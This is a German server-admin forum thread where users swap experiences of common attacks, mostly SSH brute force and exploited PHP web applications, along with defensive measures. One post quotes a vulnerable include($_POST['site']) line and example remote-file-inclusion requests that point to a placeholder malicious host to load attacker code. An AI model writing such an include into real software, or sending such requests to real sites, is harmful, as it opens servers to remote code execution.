Serverhack-Statistik - Der wahrscheinlichste Angriff

[tomotom]

Da ja in diesem Forum einige Personen Erfahrungen in der Serveradministration haben wird es sicher auch Erfahrungen über:

warscheinlichste Angriffe
häufigsten Anfriffe
Vorspiel eines Angriffs (Das Sammeln von Infos des Hackers) Angriffsversuche
Ausmaß bzw. Schäden des Angriffes
Angriffsgeschichten

geben. Es währe ja ganz interessant sich darüber, was am wahrscheinlichsten bzw. häufigsten geschieht, ein Bild zu machen.

Welche Dienste sind am häufigsten angegriffen worden?
Welche Angriffe waren bei welcher Konstellation erfolgreich?

Weiterhin wäre es interessant zu erfahren wie weit das chrooten von Diensten wie Webserver, DNS, MTA etc. in Angriffssituationen geholfen hat. Userdaten sollten ja z.B. bei einem erfolgreichen Apacheangriff geschützt sein wenn der Apache im rootjail läuft.

Sollten erfolgreiche Angriffe z.B. durch fehlerhafte php-scripte erfolgt sein wäre interessant, verfolgen zu können, was der Angreifer getan hat bzw. versucht hat.

Waren die Ziele der Angriffs bewusst ausgesucht oder wurde der Server nur zufällig ausgewählt weil vom Angreifer der Weg des geringsten Widerstandes gewählt wurde?
Was waren vermutlich die Intentionen des Angreifers?

[duergner]

Nur mal ganz allgeimein gesprochen ... die am haeufigsten auftretenden Sachen sind meiner Meinung nach fehlerhafte PHP/Perl Skripte mittels welche eine Remote Shell geladen wird. Und danach kommt es halt drauf an wie up2date das System ist, sprich ob es local-root Exploits gibt. Sollte kein local-root Exploit machbar sein kommen dann oft IRC Bouncer drauf, es wird Spam verschickt oder die Kiste wird fuer DDoS oder zum Hacken anderer Server verwendet.

[lord_pinhead]

Um sowas in Statistiken zu packen, wäre es vielleicht ratsam ein IDS System zu installieren und aus den Logs dann sein Antwort ableiten. Aber ich stimme duergner auch zu, massenhaft Scriptkiddies versuchen über den Apachen ins System zu kommen, andere Software wird immer sicherer (abgesehen vom Linuxkernel) und die nachlässigkeit der PHP und Perl Programmierer ist viel einfacher auszunutzen. Sobald man allerdings einen Samba Server im Netz stehen hat, richten sich alle Kinderaugen darauf, und es werden die Windows Exploits oder Bruteforce Tools ausgepackt, jedenfalls war das meine Erfahrung mit einem Spaßserver (ein lob an die Xen Programmierer :) ).

[Joe User]

Um sowas in Statistiken zu packen

Lüge -> gemeine Lüge -> Statistik

Glaube keiner Statistik die Du nicht selbst gefälscht hast.

SCNR

[EdRoxter]

79,41% aller Statistiken sind aus der Luft gegriffen. ;)

[tomotom]

Um sowas in Statistiken zu packen

Lüge -> gemeine Lüge -> Statistik
Glaube keiner Statistik die Du nicht selbst gefälscht hast.
SCNR

Nur zur Aufmerksamkeit: Gefragt sind EURE Erfahrugnen und keine Spekulationen. Eine "Statistik" auf die sich hier bezogen werden könnte existiert hier nicht.

Um sowas in Statistiken zu 79,41% aller Statistiken sind aus der Luft gegriffen.

Der Begriff "Statistik" ist vielleicht falsch gewählt, das er offensichtlich vom Thema ablenkt. Lest doch bitte mal genau, gefragt sind EURE erlebten Angriffszenarien etc.

Es gibt hier KEINE Statistik auf die sich bezogen werden könnte, nur zusammengetragenen Erfahrungen. Diese sind interessant und nicht Eure Meinung über Statistiken

[superdreadnought]

Um sowas in Statistiken zu packen

Lüge -> gemeine Lüge -> Statistik

Glaube keiner Statistik die Du nicht selbst gefälscht hast.

SCNR

^^ so isses, aber DoS ist schon am verbreitesten, nachdem der auch ohne sicherheitslücken in proggys geht und eine gute möglichkeit siche ine lücke ins haus zu holen ist die benutzung von open_ssl ...

[EdRoxter]

Das war doch alles SCNR, ich hab deine Intention wohl verstanden. ;)

[tomotom]

Das war doch alles SCNR, ich hab deine Intention wohl verstanden. ;)

Ja ja :) Und wo sind Deine Erfahrungen?

[captaincrunch]

Dann wollen wir doch mal:

Welche Dienste sind am häufigsten angegriffen worden?

SSH, aber eher automatisiert durch Bots, etc. Ansonsten halt Webapplikationen.

Welche Angriffe waren bei welcher Konstellation erfolgreich?

Frag mich das in ein paar Wochen noch mal (siehe Blog). ;)

[superdreadnought]

Dann wollen wir doch mal:

Welche Dienste sind am häufigsten angegriffen worden?

SSH, aber eher automatisiert durch Bots, etc. Ansonsten halt Webapplikationen.

da hilft am besten public-key authentication. damit rechnet erstens kein scriptkiddie und zweitens kann man den private key nicht einfach so erraten ...

[captaincrunch]

Danke für den Tip, nur gibt's bei mir seit Jahren ausschließlich PubKey-Auth. Die Aussage stammt viel eher aus Erfahrungen, die ich mit Hilfe von http://kojoney.sourceforge.net/ sammeln konnte.

[EdRoxter]

Das war doch alles SCNR, ich hab deine Intention wohl verstanden. ;)

Ja ja :) Und wo sind Deine Erfahrungen?

Ein paar Versuche, meinen Indianer als Proxy zu nutzen, viel versuchter Spam in einigen Gästebüchern, einmal hat's einer geschafft ein unsauberes Kontaktformular eines Kunden zum Spamversand zu bewegen.. Viele, viele UDP-Portscans, wahrscheinlich nach offenen Rootkits oder so.. Ansonsten bin ich bisher von fieseren Versuchen verschont geblieben.
Ich würde pauschal auch schlechte Webapplikationen als Hauptziel für Angriffe bezeichnen.
Ach ja: Bevor ich n00bhafterweise meinen SSH-Port umgelegt habe (PubKey und permit_root_login sind selbstvertürlich auch drinne), kamen auch vieeeele Versuche, ein Login zu bruteforcen.

[rootsvr]

Um sowas in Statistiken zu packen, wäre es vielleicht ratsam ein IDS System zu installieren und aus den Logs dann sein Antwort ableiten.

Sowas hatte ich als Thema in meiner Diplomarbeit (seit vier Wochen abgegeben *YES*), im Endeffekt bringt nen IDS da auch nicht viel, es erkennt nur was Du konfigurierst (woher bekommt man die aktuellsten Regeln für neue Exploits?) und dann ist Klioweise False Positives, bei meinen Untersuchungen waren die meisten (ernstgemeinten) Angriffe vom SQL Slammer, aber was sagt mit das für nen Linuxserver? Garnichts!

Um mal was für die Statistik beizutragen:
In einem Kundenscript ein

Code: Select all

include($_POST['site'])

einmal nen vergessenes phpbb

Die sinnlosen ssh-scans führe ich garnicht auf, PublicKey + sichere Passwörter (Murphy sagt: Du mußt nur dringend auf den Server wenn Du deinen Secret Key daheim gelassen hast) haben bisher nichts durchkommenlassen.

[EdRoxter]

.. für sowas gibt's USB-Sticks, die man am Schlüsselbund trägt. :D

[rootsvr]

Nachdem meine Freundin meinen immer am Mann getragenen USB Stick schon mal gewaschen hat kann Murphy auch da zuschlagen. Wenn mann sichere Passwörter hat spricht relativ wenig gegen ssh mit Passwort, nen Szenario konstruieren kann man imho immer.
Ich nutze Public Key wo es geht und wo nicht eben Passwort.

[EdRoxter]

Meinen habe ich auch schonmal gewaschen. Aufgemacht, gefönt, läuft weiterhin einwandfrei.



...


</OT> :)

[lord_pinhead]

Soviel zum Thema Datenreinigung :D

@rootsrv
Ist auch wieder wahr das ein IDS nur das protokolliert was ich konfiguriere, aber vieles geht ja sonst schon verloren weil dieser Dienst schon gar nicht am Server läuft. Also weiß ich teilweise nichtmal das es jemand versucht hat. Und wenn ich richtig Paranoid bin, lass ich jeden Shellcode protokollieren und jedes PHP Script das nach gewissen Muster aussieht. Eine solche Maschine eignet sich ja auch nicht als Produktivkiste, oder nur so das ich 100% weiß was darauf läuft und ich alles andere ausschliessen kann.

p.s. Stellst du deine Arbeit auch mal Online zum schmöckern ;)

@Joe
Heißt das nicht Lüge -> Lügen -> Benchmarks ;)

BTT: Also Erfahrungen hab ich bisher nicht mit SSH gemacht, klar, entweder es läuft Portknocker, oder wo ich nicht richtig rankomme im Notfall eben auf einem anderen Port. Also sind 99,9999% Versuche über den Indianer, der Rest verteilt sich auf versuche ein Openrelay zu finden, und ein paar Shellcode Attacken die für Windosen gefährlich wären. Was sonst an Portscans da durchläuft juckt mich nichtmal, wer sich beim Scannen erwischen lässt kann keine bedrohung sein :D

[Roger Wilco]

@Joe
Heißt das nicht Lüge -> Lügen -> Benchmarks ;)

Hier gilt Benchmark € Statistiken (mit € = istElement).

[rootsvr]

@rootsrv

p.s. Stellst du deine Arbeit auch mal Online zum schmöckern ;)

Würde ich wenn ich darf, aber der Finanzierer hat was dagegen (Sperrvermerk...)

[daemotron]

Das statistische Bild stabilisiert sich langsam 8)
Früher waren es in der Hauptsache Bruteforce gegen SSH, heute hauptsächlich der Versuch, IIS-Exploits bei meinen diversen Webservern (Apache und Lighty) anzuwenden - liebe Bot-Programmierer, schämt Euch :D. Wenn man Spam als Angriff bezeichnen will, hat der natürlich in den letzten Jahren dramatisch zugenommen - die Versuche, meine Mailserver als Relay zu missbrauchen allerdings nicht (konstant ca. 20-50 Versuche pro Tag). Ergo komme ich ganz gut mit den üblichen Absicherungsmaßnahmen über die Runden: SSH nur über public key, bei HTTP Prüfung der Request Header auf Injection-Versuche (URL, POST, GET), MTA als closed relay - Ehrensache. Nur bei den Maildiensten bin ich ständig am nachrüsten - irgendwie fällt den Spammern immer was neues ein, und bei den Massen, die heute aussortiert werden müssen, frisst mir reine Textmustererkennung zu viele Ressourcen...

[franki]

Auch meinen Erfahrungen nach sind es die verbreiteten PHP-Softwarepakete, durch die die Hacker auf den Server kommen. Mit den selbst geschriebenen Skripten gab es nie Probleme. Dieses Jahr haben wir eine Menge Lehrgeld zahlen müssen. Einmal war es Mambo/Joomla (siehe http://www.linuxserverforum.de/vb/showthread.php?t=1579) und einmal Horde3. Mittlerweile ist überall die Shorewall-Firewall und mod_security installiert.

Gruß von Franki.

[rootsvr]

Auch meinen Erfahrungen nach sind es die verbreiteten PHP-Softwarepakete, durch die die Hacker auf den Server kommen. Mit den selbst geschriebenen Skripten gab es nie Probleme.

Neue Exploits werden häufig von bots ausgeführt und die gehen halt auf verbreitete Standardsoftware. Es gab aber auch Bots, die Systematisch alle Parameter einer php Webseite versucht haben mittels Remote file inclusion zu hacken, sah dann so aus:

meineSite.de/index.php?site=http://bösesseite.de/a.php&session=00122388

meineSite.de/index.php?site=menu&session=http://bösesseite.de/a.php
...

per Hand hackt heute niemand mehr (oder es fällt kaum jemandem auf *g*)

[tomotom]

Auch meinen Erfahrungen nach sind es die verbreiteten PHP-Softwarepakete, durch die die Hacker auf den Server kommen. ...Einmal war es Mambo/Joomla ... und einmal Horde3...

Mir ist nicht klar wie z.B. PHP-Software welche standardmäßig durch einen Login "geschützt" ist für Agriffe ausgenutzt werden kann.

Waren oder sind es fehlerhafte Login Seiten (z.B. bei Horde3)oder vielleicht die eingeloggten User selbst welche die Angriffen durchführen?

Wenn, wie bei phpmyadmin üblich, der Zugang über htacces erfolgt kann den da ein Angriff auf die scripte von phpmyadmin erfolgen. Ich gehe davon aus, dass bei durch htacces geschützten Seiten ein Angriff so gut wie ausgeschlossen ist.

[aubergine]

Reele Erfahrungen sind gefragt, hm das find ich gut. Da mach ich mal mit 8)

=> PHP-Software

Bisher:

A bit of time ago...
Ein User aus Dänemark hat sich durch einen VHCS2 Bug (%20%20%20...)
einen weiteren Admin User angelegt.

Folgen:

Deface der Page. Durch Vorsorge mit mod_security und openbasedir etc. konnte schlimmeres verhindert werden. Er wollte eine PHP Shell draufladen.

Konsequenzen:
VHCS2 vom Netz genommen bis der Bugfix kam (glaube das war grade mal ein Tag, von daher ist die Software recht gut gewartet)